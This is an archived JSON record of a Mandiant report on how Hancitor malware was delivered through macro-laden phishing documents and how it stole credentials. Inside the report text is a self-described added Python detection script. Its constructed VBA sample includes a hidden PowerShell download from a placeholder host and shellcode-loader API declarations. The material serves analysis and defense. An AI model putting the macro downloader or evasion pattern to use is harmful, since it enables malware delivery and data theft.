{
	"id": "26813a09-c44f-40af-93ca-9d12024ee862",
	"created_at": "2026-04-06T00:18:33.407944Z",
	"updated_at": "2026-04-10T03:21:21.364549Z",
	"deleted_at": null,
	"sha1_hash": "861bb0db79af46fb50a8d820e914b6cbe15b8892",
	"title": "Hancitor (AKA Chanitor) observed using multiple attack approaches | Mandiant",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 441721,
	"plain_text": "Hancitor (AKA Chanitor) observed using multiple attack approaches | Mandiant\r\nBy Mandiant\r\nPublished: 2016-09-23 · Archived: 2026-04-05 17:37:10 UTC\r\nWritten by: Ankit Anubhav, Dileep Jallepalli\r\nMany threat actors use multiple attack vectors to ensure success. The individuals using Hancitor malware (also known as Chanitor) are no exception, and have taken three approaches to deliver the malware in order to ultimately steal data from their victims. These techniques include uncommon API abuse and PowerShell methods.\r\nWe recently observed Hancitor attacks against some of our FireEye Exploit Guard customers. The malicious document used to deliver the Hancitor executable was observed being distributed as an attachment in email spam. Once downloaded and executed, it drops an intermediate payload that in turn downloads a Pony DLL and a Vawtrak executable, which perform data theft and connect to a command and control (C2) server.\r\nStage 1: Email Delivery\r\nWe observed a number of phishing emails that reference an invoice, as seen in Figure 1. The attachment in these emails is a weaponized Microsoft Office document containing a malicious macro that, when enabled, leads to the download of Hancitor.\r\nFigure 1: Email with a malicious document attached\r\nStage 2: Macro and Luring Mechanism\r\nUpon opening the attachment, a typical luring mechanism is employed instructing the victim to enable macros, as seen in Figure 2. FireEye has observed the attackers behind this campaign using three different approaches.\r\nhttps://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html\r\nPage 1 of 9\n\nFigure 2: Luring the victim to enable macros\r\nFirst Approach\r\nUnlike other malicious macros, this one does not use the usual APIs directly to run its payload. Macros can call APIs directly, but are not normally expected to run shellcode. 
The macro used to deliver Hancitor calls the native Windows API “CallWindowProc”. This API takes a pointer to a callback function as an argument, so pointing that argument at a buffer of shellcode makes the API interpret and execute the shellcode, as depicted in Figure 3.\r\nFigure 3: Code within the macro that uses the CallWindowProc API to execute shellcode\r\nSecond Approach\r\nRecently, FireEye Exploit Guard captured Hancitor samples that leverage a different callback-accepting API. In addition to “CallWindowProc”, Hancitor samples may use the function EnumResourceTypesA to interpret and execute shellcode in the same way, as seen in Figure 4.\r\nFigure 4: EnumResourceTypesA API declaration\r\nThird Approach\r\nWe also observed a third approach used by a malicious document file to deliver Hancitor. Although the threat actor and command and control servers are similar to those of the second Hancitor delivery approach, this one uses an alternate tactic to reach its goal of data theft.\r\nWith this approach, the luring message shown in Figure 2 serves another purpose. Not only does it lure the victim into enabling macros, but the shape is also assigned the alternative text “fkwarning”, as seen in Figure 5. The macro checks this attribute to make sure the luring message shape object is present. 
If this object is not found, the macro exits without downloading additional payloads.\r\nFigure 5: Code to ensure that the luring message is intact and the malicious document is being executed for the first time\r\nEven if it finds the luring message, the macro runs its payload only once: it deletes the shape, so that the check fails and the payload never executes again, as seen in Figure 6.\r\nFigure 6: Code to delete the shape that includes the lure message\r\nThe malicious macro replaces the deleted image with another that displays the text “network error” to reduce user suspicion, as shown in Figure 7. Note that this text is always present in the document, but it is only made visible by the macro when it executes for the first time.\r\nFigure 7: The hidden text that becomes visible once the macro is executed for the first time\r\nThe macro then combines fragments of code to make a PowerShell command. However, unlike in the other approaches, the malicious code is not hidden in the macro code, a form, or the document metadata. We observed that the malware extracts malicious code fragments from within the section header of the document and combines them into a PowerShell command on the fly, as seen in Figure 8. This technique will evade some basic static detection methods applied to macro code and forms.\r\nFigure 8: PowerShell command observed in the header after increasing the font size\r\nThe malware authors have taken a very simple but interesting approach to obscure the PowerShell command text. The font size is set to 1 point, as seen in Figure 9. 
This reduces the likelihood that a casual observer will notice something unusual.\r\nFigure 9: Minimal font size to hide the content of the header\r\nUsing the “DownloadFile” method, PowerShell obtains a payload from an attacker-controlled website in ZIP archive format. It then uses the Shell.Application “CopyHere” method to unzip the payload, with the options argument set to 16, which answers “Yes to All” to any dialog so that no warning interrupts extraction, as seen in Figure 10.\r\nFigure 10: Code to download the archived payload and unzip it\r\nOnce the downloaded executable is extracted from the ZIP archive, the macro code deletes the archive using the “Kill” statement, as seen in Figure 11. After the executable runs, it downloads Pony and Vawtrak malware variants to steal data.\r\nFigure 11: Code to delete the archive\r\nDifferent Approaches, Same Hancitor\r\nAlthough there are differences between the second and third approaches to distributing Hancitor, the objective of the threat actor is the same, as we found the same command and control server being used in both approaches.\r\nHowever, we can see a minor change in the second approach's command and control servers when compared to those of the first approach: the URLs end in ls5/gate.php instead of ls4/gate.php, as seen in Figure 12.\r\nFigure 12: Earlier and newer Hancitor gates\r\nStage 3: First stage payload\r\nThe file copies itself to “%system32%” and creates a registry Run key entry for persistence. 
Upon execution, it communicates with an attacker-controlled website to download a variant of the Pony malware, “pm.dll”, along with a standard Vawtrak trojan.\r\nStage 4: Second stage payload: Pony data exfiltration capabilities\r\nWe observed a number of data theft capabilities in the second stage Pony variant, including:\r\n1) Stealing autocomplete IntelliForms data, which may include user passwords, as seen in Figure 13.\r\nFigure 13: Stealing the content of the IntelliForms registry key\r\n2) The unique GUID seen in Figure 14 is used to decrypt credentials from the Windows credential store. There is a good amount of documentation on various forums on how to use this salted value to access credentials.\r\nFigure 14: Credential stealing\r\n3) Accessing Mozilla saved passwords from “signons.txt”, as seen in Figure 15.\r\nFigure 15: Accessing Mozilla saved passwords\r\n4) Figure 16 shows the malware code related to theft via access to Microsoft OMI email configuration information. We can also see the registry entries that store the Outlook profile, which contains information about where emails and other data are stored, being accessed.\r\nFigure 16: Malware code for Outlook data theft via registry access\r\nConclusion\r\nThe malware authors responsible for Hancitor have developed several capabilities within malicious macros that support malware installation and data theft. 
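Those macro-side capabilities, as a static triage script would look for them: the following is an added example, not code from the original post or from Mandiant. It scans VBA macro source for the indicators the post describes: Declare statements for the callback-accepting APIs (CallWindowProc, EnumResourceTypesA) next to VirtualAlloc and RtlMoveMemory, a PowerShell DownloadFile command assembled from string fragments, CopyHere with option 16, the alternative-text check followed by shape deletion, and Kill on the archive. The macro text it scans is constructed for the example and is not a Hancitor sample; the A- and W-suffixed API names are assumed export variants beyond what the post shows. Because the post notes that the PowerShell command is assembled on the fly from fragments, the script folds VBA string concatenation (including through intermediate variables) before matching, which is what lets it see DownloadFile where a raw substring match over the macro text does not.

```python
# Added example: static triage of VBA macro source for the Hancitor-style indicators
# discussed in this post. The macro text below is CONSTRUCTED for illustration;
# it is not a Hancitor sample and nothing here executes macro code.

# Callback-accepting Win32 APIs that the post shows being abused to run shellcode.
# The A/W-suffixed names are an assumption (common export variants), not from the post.
CALLBACK_APIS = ('CallWindowProc', 'CallWindowProcA', 'CallWindowProcW',
                 'EnumResourceTypesA', 'EnumResourceTypesW')
# Memory APIs a callback-based loader needs to stage shellcode before invoking it.
MEMORY_APIS = ('VirtualAlloc', 'RtlMoveMemory')
QUOTE = '\"'

# Constructed macro combining the three approaches: callback loader declarations,
# alt-text check with shape deletion, fragmented PowerShell downloader, CopyHere 16, Kill.
SAMPLE_MACRO = '''
Private Declare PtrSafe Function CallWindowProc Lib \"user32\" Alias \"CallWindowProcA\" (ByVal lpPrevWndFunc As LongPtr, ByVal hWnd As LongPtr, ByVal Msg As Long, ByVal wParam As LongPtr, ByVal lParam As LongPtr) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib \"kernel32\" (ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr
Private Declare PtrSafe Sub RtlMoveMemory Lib \"kernel32\" (ByVal Destination As LongPtr, ByRef Source As Any, ByVal Length As Long)

Sub AutoOpen()
    Dim sh As Shape
    Set sh = ActiveDocument.Shapes(1)
    If sh.AlternativeText <> \"fkwarning\" Then Exit Sub
    sh.Delete
    p1 = \"power\"
    p2 = \"shell -w hidden (New-Object Net.WebClient).Down\"
    p3 = \"loadFile('http://example.invalid/x.zip', 'C:/Users/Public/x.zip')\"
    cmd = p1 & p2 & p3
    Shell cmd, 0
    tmp = Environ(\"TEMP\")
    zipPath = tmp & \"/x.zip\"
    Set app = CreateObject(\"Shell.Application\")
    app.NameSpace(tmp).CopyHere app.NameSpace(zipPath).Items, 16
    Kill zipPath
End Sub
'''

# Constructed benign macro used to show the checks do not fire on ordinary code.
BENIGN_MACRO = '''
Sub AutoOpen()
    MsgBox \"Document loaded\"
End Sub
'''


def split_operands(expr):
    # Split a VBA expression on the & concatenation operator, leaving quoted literals intact.
    parts, cur, in_str = [], '', False
    for ch in expr:
        if ch == QUOTE:
            in_str = not in_str
            cur += ch
        elif ch == '&' and not in_str:
            parts.append(cur.strip())
            cur = ''
        else:
            cur += ch
    parts.append(cur.strip())
    return [p for p in parts if p]


def fold_strings(macro_text):
    # Resolve simple assignments of the form  name = lit & other & lit  into constants, so a
    # command assembled from fragments (as the post describes) becomes visible to matching.
    # Operands that cannot be resolved are kept as <name> placeholders.
    consts = {}
    for raw in macro_text.splitlines():
        line = raw.strip()
        low = line.lower()
        if low.startswith(('dim ', 'set ', 'if ', 'elseif ', 'for ', 'private ', 'public ')):
            continue
        name, sep, expr = line.partition('=')
        name = name.strip()
        if not sep or not name.isidentifier():
            continue
        value = ''
        for op in split_operands(expr):
            if len(op) >= 2 and op[0] == QUOTE and op[-1] == QUOTE:
                value += op[1:-1]
            elif op in consts:
                value += consts[op]
            else:
                value += '<' + op + '>'
        consts[name] = value
    return consts


def copyhere_silent(macro_text):
    # CopyHere with option 16 answers Yes to All to any dialog, so extraction never prompts.
    for line in macro_text.splitlines():
        low = line.lower()
        if 'copyhere' in low and '16' in low.split('copyhere', 1)[1]:
            return True
    return False


def triage(macro_text):
    # Return the indicators found; every value is a bool except callback_apis (names seen).
    folded = ' '.join(fold_strings(macro_text).values())
    joined = (macro_text + ' ' + folded).lower()
    callbacks = [api for api in CALLBACK_APIS if api in macro_text]
    memory = [api for api in MEMORY_APIS if api in macro_text]
    return {
        'callback_apis': callbacks,
        'callback_shellcode_loader': bool(callbacks) and bool(memory),
        'powershell_downloader': 'powershell' in joined and 'downloadfile' in joined,
        'silent_unzip': copyhere_silent(macro_text),
        'run_once_shape_check': 'alternativetext' in joined and '.delete' in joined,
        'archive_cleanup': any(l.strip().lower().startswith('kill ')
                               for l in macro_text.splitlines()),
    }


if __name__ == '__main__':
    for label, macro in (('sample', SAMPLE_MACRO), ('benign', BENIGN_MACRO)):
        print(label, triage(macro))
    print('folded command:', fold_strings(SAMPLE_MACRO)['cmd'])
```

The folding step is deliberately shallow (straight-line assignments only, no loops or Chr() decoding), which mirrors the limit the post points at: anything assembled from document content such as the tiny-font header text is invisible to this kind of scan, so the script is a triage aid for olevba-style output, not a substitute for running the document in a sandbox.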
These capabilities include leveraging uncommon APIs and obscuring malicious PowerShell commands, tactics that make detection more challenging.\r\nFireEye Exploit Guard provides organizations with the ability to detect malicious shellcode in the initial phase of the attack lifecycle, regardless of these evasion techniques.\r\nFireEye recommends that organizations use Group Policy to block macros in Microsoft Office documents that originate from the Internet. In all cases, users should be cautious about enabling macros and should remain vigilant about opening email messages from untrusted sources.\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MITRE"
	],
	"references": [
		"https://www.fireeye.com/blog/threat-research/2016/09/hancitor_aka_chanit.html"
	],
	"report_names": [
		"hancitor_aka_chanit.html"
	],
	"threat_actors": [],
	"ts_created_at": 1775434713,
	"ts_updated_at": 1775791281,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/861bb0db79af46fb50a8d820e914b6cbe15b8892.pdf",
		"text": "https://archive.orkl.eu/861bb0db79af46fb50a8d820e914b6cbe15b8892.txt",
		"img": "https://archive.orkl.eu/861bb0db79af46fb50a8d820e914b6cbe15b8892.jpg"
	}
}